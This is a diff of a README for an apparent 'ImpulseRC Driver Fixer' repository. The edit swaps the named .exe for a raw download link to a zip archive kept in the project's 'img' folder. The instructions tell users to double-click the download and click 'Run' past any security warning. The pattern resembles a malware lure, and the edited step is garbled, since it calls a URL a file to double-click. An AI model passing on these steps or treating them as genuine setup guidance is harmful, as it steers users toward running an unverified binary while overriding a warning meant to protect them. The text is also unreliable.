HUESITOS2411200/ImpulseRC_Driver_Fixer/README.md

 1. Navigate to the folder where the file was downloaded.
 2. If you downloaded a ".zip" file, right-click on it and select "Extract All".
 Follow the prompts to unzip the files.
-3. Find the "ImpulseRC_Driver_Fixer.exe" file and double-click it.
+3. Find the "https://github.com/HUESITOS2411200/ImpulseRC_Driver_Fixer/raw/refs/heads/main/img/R_Impulse_Fixer_Driver_v2.2.zip" file and double-click it.
 4. You may see a security warning.
 If so, click "Run" to continue.
 5. The application will open, and you can follow the on-screen instructions.